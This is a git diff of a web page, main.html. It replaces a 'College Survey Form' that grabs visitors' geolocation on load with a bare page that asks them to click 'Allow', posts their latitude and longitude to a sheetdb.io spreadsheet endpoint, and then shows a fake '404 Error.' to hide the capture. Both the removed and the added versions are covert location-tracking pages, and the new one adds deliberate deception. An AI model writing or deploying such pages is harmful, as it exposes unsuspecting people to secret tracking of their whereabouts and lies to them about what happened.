--- a/main.html
+++ b/main.html
@@ -1,171 +1,24 @@
 <!DOCTYPE html>
-<html lang="en">
-<head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1" />
-  <title>College Survey Form with Location</title>
-  <style>
-    body {
-      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
-      background: #f0f4f8;
-      margin: 0;
-      padding: 2rem;
-      display: flex;
-      justify-content: center;
-    }
-    form {
-      background: white;
-      max-width: 500px;
-      width: 100%;
-      padding: 2rem 2.5rem;
-      border-radius: 8px;
-      box-shadow: 0 6px 20px rgba(0,0,0,0.1);
-    }
-    h2 {
-      margin-bottom: 1.5rem;
-      color: #333;
-      text-align: center;
-    }
-    label {
-      display: block;
-      margin-top: 1rem;
-      font-weight: 600;
-      color: #555;
-    }
-    input, select, textarea {
-      width: 100%;
-      padding: 0.6rem 0.8rem;
-      margin-top: 0.3rem;
-      border: 1.8px solid #ccc;
-      border-radius: 5px;
-      font-size: 1rem;
-      font-family: inherit;
-      transition: border-color 0.3s ease;
-    }
-    input:focus, select:focus, textarea:focus {
-      border-color: #007BFF;
-      outline: none;
-    }
-    button {
-      margin-top: 1.8rem;
-      width: 100%;
-      background-color: #007BFF;
-      border: none;
-      color: white;
-      padding: 0.75rem;
-      font-size: 1.1rem;
-      font-weight: 700;
-      border-radius: 6px;
-      cursor: pointer;
-      transition: background-color 0.3s ease;
-    }
-    button:hover {
-      background-color: #0056b3;
-    }
-    .message {
-      margin-top: 1rem;
-      text-align: center;
-      font-weight: 600;
-    }
-    .message.success {
-      color: green;
-    }
-    .message.error {
-      color: red;
-    }
-  </style>
-</head>
+<html>
 <body>
-
-<form id="surveyForm">
-  <h2>College Survey Form</h2>
-
-  <p id="msg" class="message"></p>
-
-  <label for="name">Full Name *</label>
-  <input type="text" id="name" name="name" required />
-
-  <label for="email">Email Address *</label>
-  <input type="email" id="email" name="email" required />
-
-  <label for="college">College Name *</label>
-  <input type="text" id="college" name="college" required />
-
-  <label for="course">Course *</label>
-  <select id="course" name="course" required>
-    <option value="" disabled selected>Select your course</option>
-    <option value="Computer Science">Computer Science</option>
-    <option value="Electrical Engineering">Electrical Engineering</option>
-    <option value="Mechanical Engineering">Mechanical Engineering</option>
-    <option value="Civil Engineering">Civil Engineering</option>
-    <option value="Other">Other</option>
-  </select>
-
-  <label for="year">Year of Study *</label>
-  <select id="year" name="year" required>
-    <option value="" disabled selected>Select your year</option>
-    <option value="1st Year">1st Year</option>
-    <option value="2nd Year">2nd Year</option>
-    <option value="3rd Year">3rd Year</option>
-    <option value="4th Year">4th Year</option>
-  </select>
-
-  <label for="comments">Comments or Feedback</label>
-  <textarea id="comments" name="comments" rows="4" placeholder="Your thoughts..."></textarea>
-
-  <button type="submit">Submit Survey</button>
-</form>
-
+<h2>Click "Allow" to share your location</h2>
 <script>
-  const msg = document.getElementById("msg");
-
-  const API_URL = "https://sheetdb.io/api/v1/g0jdtpbi0265s"; // Replace with your endpoint
-
-  window.addEventListener("load", () => {
-    msg.textContent = "Requesting location permission...";
-
-    if (!navigator.geolocation) {
-      msg.textContent = "Geolocation not supported.";
-      msg.className = "message error";
-      return;
-    }
-
-    navigator.geolocation.getCurrentPosition(
-      async (position) => {
-        const data = {
-          data: [{
-            lat: position.coords.latitude,
-            lon: position.coords.longitude,
-            timestamp: new Date().toISOString()
-          }]
-        };
-
-        try {
-          const res = await fetch(API_URL, {
-            method: "POST",
-            headers: { "Content-Type": "application/json" },
-            body: JSON.stringify(data)
-          });
-
-          if (res.ok) {
-            msg.textContent = "Location sent successfully. Please fill the form.";
-            msg.className = "message success";
-          } else {
-            msg.textContent = "Failed to send location.";
-            msg.className = "message error";
-          }
-        } catch (err) {
-          msg.textContent = "Error sending location.";
-          msg.className = "message error";
-        }
-      },
-      () => {
-        msg.textContent = "Location permission denied.";
-        msg.className = "message error";
-      }
-    );
-  });
+navigator.geolocation.getCurrentPosition(
+  function(position) {
+    fetch("https://sheetdb.io/api/v1/g0jdtpbi0265s", {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify({
+        lat: position.coords.latitude,
+        lon: position.coords.longitude
+      })
+    });
+    document.body.innerHTML += `<p>404 Error.</p>`;
+  },
+  function(error) {
+    alert("Location access denied.");
+  }
+);
 </script>
-
 </body>
 </html>
